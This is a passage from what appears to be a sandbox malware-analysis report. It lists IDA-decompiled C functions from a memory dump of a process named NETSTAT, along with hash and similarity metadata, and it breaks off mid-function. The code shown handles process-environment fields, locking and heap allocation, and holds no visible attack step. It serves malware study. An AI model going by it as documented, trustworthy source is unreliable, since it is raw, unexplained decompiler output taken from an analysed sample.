                			}


                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6e85796fea4ca12d4479b5c01b1d4092ef0ea61c6f9b7a625f8fd1daef32f6ed
                • Instruction ID: 7b59d934a8152b63b94ec962536dab4e2fefa3d1ff2c66e10314cbb6efc5226f
                • Opcode Fuzzy Hash: 6e85796fea4ca12d4479b5c01b1d4092ef0ea61c6f9b7a625f8fd1daef32f6ed
                • Instruction Fuzzy Hash: 6231A072A00219EBCF11EF65CDC1ABEB7B9EF04700B05446AF911EB150E774A961DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 97%
                			E033861A0(signed int* __ecx) {
                				intOrPtr _v8;
                				char _v12;
                				intOrPtr* _v16;
                				intOrPtr _v20;
                				intOrPtr _t30;
                				intOrPtr _t31;
                				void* _t32;
                				intOrPtr _t33;
                				intOrPtr _t37;
                				intOrPtr _t49;
                				signed int _t51;
                				intOrPtr _t52;
                				signed int _t54;
                				void* _t59;
                				signed int* _t61;
                				intOrPtr* _t64;
                
                				_t61 = __ecx;
                				_v12 = 0;
                				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                				_v16 = __ecx;
                				_v8 = 0;
                				if(_t30 == 0) {
                					L6:
                					_t31 = 0;
                					L7:
                					return _t31;
                				}
                				_t32 = _t30 + 0x5d8;
                				if(_t32 == 0) {
                					goto L6;
                				}
                				_t59 = _t32 + 0x30;
                				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                					goto L6;
                				}
                				if(__ecx != 0) {
                					 *((intOrPtr*)(__ecx)) = 0;
                					 *((intOrPtr*)(__ecx + 4)) = 0;
                				}
                				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                					_t51 =  *(_t32 + 0x10);
                					_t33 = _t32 + 0x10;
                					_v20 = _t33;
                					_t54 =  *(_t33 + 4);
                					if((_t51 | _t54) == 0) {
                						_t37 = E03385E50(0x33367cc, 0, 0,  &_v12);
                						if(_t37 != 0) {
                							goto L6;
                						}
                						_t52 = _v8;
                						asm("lock cmpxchg8b [esi]");
                						_t64 = _v16;
                						_t49 = _t37;
                						_v20 = 0;
                						if(_t37 == 0) {
                							if(_t64 != 0) {
                								 *_t64 = _v12;
                								 *((intOrPtr*)(_t64 + 4)) = _t52;
                							}
                							E03429D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                							_t31 = 1;
                							goto L7;
                						}
                						E0335F7C0(_t52, _v12, _t52, 0);
                						if(_t64 != 0) {
                							 *_t64 = _t49;
                							 *((intOrPtr*)(_t64 + 4)) = _v20;
                						}
                						L12:
                						_t31 = 1;
                						goto L7;
                					}
                					if(_t61 != 0) {
                						 *_t61 = _t51;
                						_t61[1] = _t54;
                					}
                					goto L12;
                				} else {
                					goto L6;
                				}
                			}


                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: badbf1ffbfa8fedfbf763ddc59d86b5c62521fd8355b5c0f0819813928ed3e82
                • Instruction ID: 5f20ecbc132d753ef0356d4f4e9bcea301e6cddb95d2300871e158defb842a97
                • Opcode Fuzzy Hash: badbf1ffbfa8fedfbf763ddc59d86b5c62521fd8355b5c0f0819813928ed3e82
                • Instruction Fuzzy Hash: 98315A716157418FD360DF19C981B2AF7E9FB88B00F09496DE9989B752E7B0E804CB91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E03394A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                				signed int _v8;
                				signed int* _v12;
                				char _v13;
                				signed int _v16;
                				char _v21;
                				signed int* _v24;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t29;
                				signed int* _t32;
                				signed int* _t41;
                				signed int _t42;
                				void* _t43;
                				intOrPtr* _t51;
                				void* _t52;
                				signed int _t53;
                				signed int _t58;
                				void* _t59;
                				signed int _t60;
                				signed int _t62;
                
                				_t49 = __edx;
                				_t62 = (_t60 & 0xfffffff8) - 0xc;
                				_t26 =  *0x344d360 ^ _t62;
                				_v8 =  *0x344d360 ^ _t62;
                				_t41 = __ecx;
                				_t51 = __edx;
                				_v12 = __ecx;
                				if(_a4 == 0) {
                					if(_a8 != 0) {
                						goto L1;
                					}
                					_v13 = 1;
                					E03372280(_t26, 0x3448608);
                					_t58 =  *_t41;
                					if(_t58 == 0) {
                						L11:
                						E0336FFB0(_t41, _t51, 0x3448608);
                						L2:
                						 *0x344b1e0(_a4, _a8);
                						_t42 =  *_t51();
                						if(_t42 == 0) {
                							_t29 = 0;
                							L5:
                							_pop(_t52);
                							_pop(_t59);
                							_pop(_t43);
                							return E0339B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                						}
                						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                						if(_v21 != 0) {
                							_t53 = 0;
                							E03372280(_t28, 0x3448608);
                							_t32 = _v24;
                							if( *_t32 == _t58) {
                								 *_t32 = _t42;
                								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                								if(_t58 != 0) {
                									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                									asm("sbb edi, edi");
                									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                								}
                							}
                							E0336FFB0(_t42, _t53, 0x3448608);
                							if(_t53 != 0) {
                								L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                							}
                						}
                						_t29 = _t42;
                						goto L5;
                					}
                					if( *((char*)(_t58 + 0x40)) != 0) {
                						L10:
                						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                						E0336FFB0(_t41, _t51, 0x3448608);
                						_t29 = _t58;
                						goto L5;
                					}
                					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                						goto L11;
                					}
                					goto L10;
                				}
                				L1:
                				_v13 = 0;
                				_t58 = 0;
                				goto L2;
                			}


                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4e8e6e6fd398b59962d322c5acdfc1077f32edba548daa60b667aa9a71e7c000
                • Instruction ID: 5ba8598e09656917d42e03be8091456cce0d1742c9bb1f37385bd3487c203370
                • Opcode Fuzzy Hash: 4e8e6e6fd398b59962d322c5acdfc1077f32edba548daa60b667aa9a71e7c000
                • Instruction Fuzzy Hash: 6B312136605340DFEB21EF15CDC1B2AB7A9FB81B10F18456AE8664F650C770D802CB89
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E03398EC7(void* __ecx, void* __edx) {
                				signed int _v8;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				char* _v28;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				intOrPtr _v40;
                				signed int* _v44;
                				intOrPtr _v48;
                				intOrPtr _v52;
                				intOrPtr _v56;
                				signed int* _v60;
                				intOrPtr _v64;
                				intOrPtr _v68;
                				intOrPtr _v72;
                				char* _v76;
                				intOrPtr _v80;
                				signed int _v84;
                				intOrPtr _v88;
                				intOrPtr _v92;
                				intOrPtr _v96;
                				intOrPtr _v100;
                				intOrPtr _v104;
                				signed int* _v108;
                				char _v140;
                				signed int _v144;
                				signed int _v148;
                				intOrPtr _v152;
                				char _v156;
                				intOrPtr _v160;
                				char _v164;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* _t67;
                				intOrPtr _t70;
                				void* _t71;
                				void* _t72;
                				signed int _t73;
                
                				_t69 = __edx;
                				_v8 =  *0x344d360 ^ _t73;
                				_t48 =  *[fs:0x30];
                				_t72 = __edx;
                				_t71 = __ecx;
                				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                					_t48 = E03384E70(0x34486e4, 0x3399490, 0, 0);
                					if( *0x34453e8 > 5 && E03398F33(0x34453e8, 0, 0x2000) != 0) {
                						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                						_v108 =  &_v84;
                						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                						_v76 =  &_v156;
                						_t70 = 8;
                						_v60 =  &_v144;
                						_t67 = 4;
                						_v44 =  &_v148;
                						_v152 = 0;
                						_v160 = 0;
                						_v104 = 0;
                						_v100 = 2;
                						_v96 = 0;
                						_v88 = 0;
                						_v80 = 0;
                						_v72 = 0;
                						_v68 = _t70;
                						_v64 = 0;
                						_v56 = 0;
                						_v52 = 0x34453e8;
                						_v48 = 0;
                						_v40 = 0;
                						_v36 = 0x34453e8;
                						_v32 = 0;
                						_v28 =  &_v164;
                						_v24 = 0;
                						_v20 = _t70;
                						_v16 = 0;
                						_t69 = 0x333bc46;
                						_t48 = E033D7B9C(0x34453e8, 0x333bc46, _t67, 0x34453e8, _t70,  &_v140);
                					}
                				}
                				return E0339B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                			}


                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 79f152da4070ea279bba60c673daf91663e52b1707147cc7bb7f1df9804ec36e
                • Instruction ID: 0ba5838f9211306f308331c68cd871541050d8dbdab33b14ca832224dfaf799e
                • Opcode Fuzzy Hash: 79f152da4070ea279bba60c673daf91663e52b1707147cc7bb7f1df9804ec36e
                • Instruction Fuzzy Hash: F6417FB5D003189ADB20CFAAD981AADFBF8BB49710F5041AFE519A7640E7705A84CF50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 74%
                			E0338E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                				intOrPtr* _v0;
                				signed char _v4;
                				signed int _v8;
                				void* __ecx;
                				void* __ebp;
                				void* _t37;
                				intOrPtr _t38;
                				signed int _t44;
                				signed char _t52;
                				void* _t54;
                				intOrPtr* _t56;
                				void* _t58;
                				char* _t59;
                				signed int _t62;
                
                				_t58 = __edx;
                				_push(0);
                				_push(4);
                				_push( &_v8);
                				_push(0x24);
                				_push(0xffffffff);
                				if(E03399670() < 0) {
                					L033ADF30(_t54, _t58, _t35);
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					_push(_t54);
                					_t52 = _v4;
                					if(_t52 > 8) {
                						_t37 = 0xc0000078;
                					} else {
                						_t38 =  *0x3447b9c; // 0x0
                						_t62 = _t52 & 0x000000ff;
                						_t59 = L03374620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                						if(_t59 == 0) {
                							_t37 = 0xc0000017;
                						} else {
                							_t56 = _v0;
                							 *(_t59 + 1) = _t52;
                							 *_t59 = 1;
                							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                							_t44 = _t62 - 1;
                							if(_t44 <= 7) {
                								switch( *((intOrPtr*)(_t44 * 4 +  &M0338E810))) {
                									case 0:
                										L6:
                										 *((intOrPtr*)(_t59 + 8)) = _a8;
                										goto L7;
                									case 1:
                										L13:
                										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                										goto L6;
                									case 2:
                										L12:
                										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                										goto L13;
                									case 3:
                										L11:
                										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                										goto L12;
                									case 4:
                										L10:
                										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                										goto L11;
                									case 5:
                										L9:
                										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                										goto L10;
                									case 6:
                										L17:
                										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                										goto L9;
                									case 7:
                										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                										goto L17;
                								}
                							}
                							L7:
                							 *_a40 = _t59;
                							_t37 = 0;
                						}
                					}
                					return _t37;
                				} else {
                					_push(0x20);
                					asm("ror eax, cl");
                					return _a4 ^ _v8;
                				}
                			}

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3cb2d57019ba72a96ee0e6f4d203b7ac3ace735afbf1e7210f5578ab25b04ef8
                • Instruction ID: b7332935a5668324b71a074c9c01dcb630ebb0c7dd1beeb8a2311fb73b86f12c
                • Opcode Fuzzy Hash: 3cb2d57019ba72a96ee0e6f4d203b7ac3ace735afbf1e7210f5578ab25b04ef8
                • Instruction Fuzzy Hash: CF318C75A14349EFDB04DF58C881B9ABBE8FB09314F14866AF904CB741D631EC80CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 67%
                			E0338BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				void* __ebx;
                				void* __edi;
                				intOrPtr _t22;
                				intOrPtr* _t41;
                				intOrPtr _t51;
                
                				_t51 =  *0x3446100; // 0xa
                				_v12 = __edx;
                				_v8 = __ecx;
                				if(_t51 >= 0x800) {
                					L12:
                					return 0;
                				} else {
                					goto L1;
                				}
                				while(1) {
                					L1:
                					_t22 = _t51;
                					asm("lock cmpxchg [ecx], edx");
                					if(_t51 == _t22) {
                						break;
                					}
                					_t51 = _t22;
                					if(_t22 < 0x800) {
                						continue;
                					}
                					goto L12;
                				}
                				E03372280(0xd, 0x1055f1a0);
                				_t41 =  *0x34460f8; // 0x0
                				if(_t41 != 0) {
                					 *0x34460f8 =  *_t41;
                					 *0x34460fc =  *0x34460fc + 0xffff;
                				}
                				E0336FFB0(_t41, 0x800, 0x1055f1a0);
                				if(_t41 != 0) {
                					L6:
                					asm("movsd");
                					asm("movsd");
                					asm("movsd");
                					asm("movsd");
                					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                					do {
                						asm("lock xadd [0x34460f0], ax");
                						 *((short*)(_t41 + 0x34)) = 1;
                					} while (1 == 0);
                					goto L8;
                				} else {
                					_t41 = L03374620(0x3446100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                					if(_t41 == 0) {
                						L11:
                						asm("lock dec dword [0x3446100]");
                						L8:
                						return _t41;
                					}
                					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                					if(_t41 == 0) {
                						goto L11;
                					}
                					goto L6;
                				}
                			}

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cea5a2f1b7f7b8c5a7c6cb181229dd8a31e19b3e43644d154dd82180f6ca1baa
                • Instruction ID: 3f682fc2ab22b548cf01a8154ba6e61607baecae3090c99e874b63601191b73a
                • Opcode Fuzzy Hash: cea5a2f1b7f7b8c5a7c6cb181229dd8a31e19b3e43644d154dd82180f6ca1baa
                • Instruction Fuzzy Hash: 1731C17AA00716ABCB11FF58D8C07A6B3B8FB19315F054079ED44EF205E778D94A8B90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 76%
                			E03359100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                				signed int _t53;
                				signed int _t56;
                				signed int* _t60;
                				signed int _t63;
                				signed int _t66;
                				signed int _t69;
                				void* _t70;
                				intOrPtr* _t72;
                				void* _t78;
                				void* _t79;
                				signed int _t80;
                				intOrPtr _t82;
                				void* _t85;
                				void* _t88;
                				void* _t89;
                
                				_t84 = __esi;
                				_t70 = __ecx;
                				_t68 = __ebx;
                				_push(0x2c);
                				_push(0x342f6e8);
                				E033AD0E8(__ebx, __edi, __esi);
                				 *((char*)(_t85 - 0x1d)) = 0;
                				_t82 =  *((intOrPtr*)(_t85 + 8));
                				if(_t82 == 0) {
                					L4:
                					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                						E034288F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                					}
                					L5:
                					return E033AD130(_t68, _t82, _t84);
                				}
                				_t88 = _t82 -  *0x34486c0; // 0xb307b0
                				if(_t88 == 0) {
                					goto L4;
                				}
                				_t89 = _t82 -  *0x34486b8; // 0x0
                				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                					goto L4;
                				} else {
                					E03372280(_t82 + 0xe0, _t82 + 0xe0);
                					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                					__eflags =  *((char*)(_t82 + 0xe5));
                					if(__eflags != 0) {
                						E034288F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                						goto L12;
                					} else {
                						__eflags =  *((char*)(_t82 + 0xe4));
                						if( *((char*)(_t82 + 0xe4)) == 0) {
                							 *((char*)(_t82 + 0xe4)) = 1;
                							_push(_t82);
                							_push( *((intOrPtr*)(_t82 + 0x24)));
                							E0339AFD0();
                						}
                						while(1) {
                							_t60 = _t82 + 8;
                							 *(_t85 - 0x2c) = _t60;
                							_t68 =  *_t60;
                							_t80 = _t60[1];
                							 *(_t85 - 0x28) = _t68;
                							 *(_t85 - 0x24) = _t80;
                							while(1) {
                								L10:
                								__eflags = _t80;
                								if(_t80 == 0) {
                									break;
                								}
                								_t84 = _t68;
                								 *(_t85 - 0x30) = _t80;
                								 *(_t85 - 0x24) = _t80 - 1;
                								asm("lock cmpxchg8b [edi]");
                								_t68 = _t84;
                								 *(_t85 - 0x28) = _t68;
                								 *(_t85 - 0x24) = _t80;
                								__eflags = _t68 - _t84;
                								_t82 =  *((intOrPtr*)(_t85 + 8));
                								if(_t68 != _t84) {
                									continue;
                								}
                								__eflags = _t80 -  *(_t85 - 0x30);
                								if(_t80 !=  *(_t85 - 0x30)) {
                									continue;
                								}
                								__eflags = _t80;
                								if(_t80 == 0) {
                									break;
                								}
                								_t63 = 0;
                								 *(_t85 - 0x34) = 0;
                								_t84 = 0;
                								__eflags = 0;
                								while(1) {
                									 *(_t85 - 0x3c) = _t84;
                									__eflags = _t84 - 3;
                									if(_t84 >= 3) {
                										break;
                									}
                									__eflags = _t63;
                									if(_t63 != 0) {
                										L40:
                										_t84 =  *_t63;
                										__eflags = _t84;
                										if(_t84 != 0) {
                											_t84 =  *(_t84 + 4);
                											__eflags = _t84;
                											if(_t84 != 0) {
                												 *0x344b1e0(_t63, _t82);
                												 *_t84();
                											}
                										}
                										do {
                											_t60 = _t82 + 8;
                											 *(_t85 - 0x2c) = _t60;
                											_t68 =  *_t60;
                											_t80 = _t60[1];
                											 *(_t85 - 0x28) = _t68;
                											 *(_t85 - 0x24) = _t80;
                											goto L10;
                										} while (_t63 == 0);
                										goto L40;
                									}
                									_t69 = 0;
                									__eflags = 0;
                									while(1) {
                										 *(_t85 - 0x38) = _t69;
                										__eflags = _t69 -  *0x34484c0;
                										if(_t69 >=  *0x34484c0) {
                											break;
                										}
                										__eflags = _t63;
                										if(_t63 != 0) {
                											break;
                										}
                										_t66 = E03429063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                										__eflags = _t66;
                										if(_t66 == 0) {
                											_t63 = 0;
                											__eflags = 0;
                										} else {
                											_t63 = _t66 + 0xfffffff4;
                										}
                										 *(_t85 - 0x34) = _t63;
                										_t69 = _t69 + 1;
                									}
                									_t84 = _t84 + 1;
                								}
                								__eflags = _t63;
                							}
                							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                							 *((char*)(_t82 + 0xe5)) = 1;
                							 *((char*)(_t85 - 0x1d)) = 1;
                							L12:
                							 *(_t85 - 4) = 0xfffffffe;
                							E0335922A(_t82);
                							_t53 = E03377D50();
                							__eflags = _t53;
                							if(_t53 != 0) {
                								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                							} else {
                								_t56 = 0x7ffe0386;
                							}
                							__eflags =  *_t56;
                							if( *_t56 != 0) {
                								_t56 = E03428B58(_t82);
                							}
                							__eflags =  *((char*)(_t85 - 0x1d));
                							if( *((char*)(_t85 - 0x1d)) != 0) {
                								__eflags = _t82 -  *0x34486c0; // 0xb307b0
                								if(__eflags != 0) {
                									__eflags = _t82 -  *0x34486b8; // 0x0
                									if(__eflags == 0) {
                										_t79 = 0x34486bc;
                										_t72 = 0x34486b8;
                										goto L18;
                									}
                									__eflags = _t56 | 0xffffffff;
                									asm("lock xadd [edi], eax");
                									if(__eflags == 0) {
                										E03359240(_t68, _t82, _t82, _t84, __eflags);
                									}
                								} else {
                									_t79 = 0x34486c4;
                									_t72 = 0x34486c0;
                									L18:
                									E03389B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                								}
                							}
                							goto L5;
                						}
                					}
                				}
                			}

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 318980a38051d4ff4a8b1f907fae86d7792de7e33c2df01427ece61d2581fe93
                • Instruction ID: e33def29288f89c5d077027382264c1bbc74c7c1a4f1304739abb0076971c209
                • Opcode Fuzzy Hash: 318980a38051d4ff4a8b1f907fae86d7792de7e33c2df01427ece61d2581fe93
                • Instruction Fuzzy Hash: B831D879A01768DFDB61DB68C8C8FACBBF5BB48350F1C8199E8056B651C335AA40CB51
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 60%
                			E03381DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                				char _v8;
                				intOrPtr _v12;
                				intOrPtr _v16;
                				intOrPtr* _v20;
                				void* _t22;
                				char _t23;
                				void* _t36;
                				intOrPtr _t42;
                				intOrPtr _t43;
                
                				_v12 = __ecx;
                				_t43 = 0;
                				_v20 = __edx;
                				_t42 =  *__edx;
                				 *__edx = 0;
                				_v16 = _t42;
                				_push( &_v8);
                				_push(0);
                				_push(0);
                				_push(6);
                				_push(0);
                				_push(__ecx);
                				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                				_push(_t36);
                				_t22 = E0337F460();
                				if(_t22 < 0) {
                					if(_t22 == 0xc0000023) {
                						goto L1;
                					}
                					L3:
                					return _t43;
                				}
                				L1:
                				_t23 = _v8;
                				if(_t23 != 0) {
                					_t38 = _a4;
                					if(_t23 >  *_a4) {
                						_t42 = L03374620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                						if(_t42 == 0) {
                							goto L3;
                						}
                						_t23 = _v8;
                					}
                					_push( &_v8);
                					_push(_t23);
                					_push(_t42);
                					_push(6);
                					_push(_t43);
                					_push(_v12);
                					_push(_t36);
                					if(E0337F460() < 0) {
                						if(_t42 != 0 && _t42 != _v16) {
                							L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                						}
                						goto L3;
                					}
                					 *_v20 = _t42;
                					 *_a4 = _v8;
                				}
                				_t43 = 1;
                				goto L3;
                			}

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                • Instruction ID: 27178300305dbf6f753cd34c759730228390ab82a209a8a7d240f9d32b1b0923
                • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                • Instruction Fuzzy Hash: 4B217C76A00219EBD721EF99CCC0EAAFBBDFF85640F154055E9059B220D634BE42CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 53%
                			E03370050(void* __ecx) {
                				signed int _v8;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				intOrPtr* _t30;
                				intOrPtr* _t31;
                				signed int _t34;
                				void* _t40;
                				void* _t41;
                				signed int _t44;
                				intOrPtr _t47;
                				signed int _t58;
                				void* _t59;
                				void* _t61;
                				void* _t62;
                				signed int _t64;
                
                				_push(__ecx);
                				_v8 =  *0x344d360 ^ _t64;
                				_t61 = __ecx;
                				_t2 = _t61 + 0x20; // 0x20
                				E03389ED0(_t2, 1, 0);
                				_t52 =  *(_t61 + 0x8c);
                				_t4 = _t61 + 0x8c; // 0x8c
                				_t40 = _t4;
                				do {
                					_t44 = _t52;
                					_t58 = _t52 & 0x00000001;
                					_t24 = _t44;
                					asm("lock cmpxchg [ebx], edx");
                					_t52 = _t44;
                				} while (_t52 != _t44);
                				if(_t58 == 0) {
                					L7:
                					_pop(_t59);
                					_pop(_t62);
                					_pop(_t41);
                					return E0339B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                				}
                				asm("lock xadd [esi], eax");
                				_t47 =  *[fs:0x18];
                				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                				if(_t30 != 0) {
                					if( *_t30 == 0) {
                						goto L4;
                					}
                					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                					L5:
                					if( *_t31 != 0) {
                						_t18 = _t61 + 0x78; // 0x78
                						E03428A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                					}
                					_t52 =  *(_t61 + 0x5c);
                					_t11 = _t61 + 0x78; // 0x78
                					_t34 = E03389702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                					_t24 = _t34 | 0xffffffff;
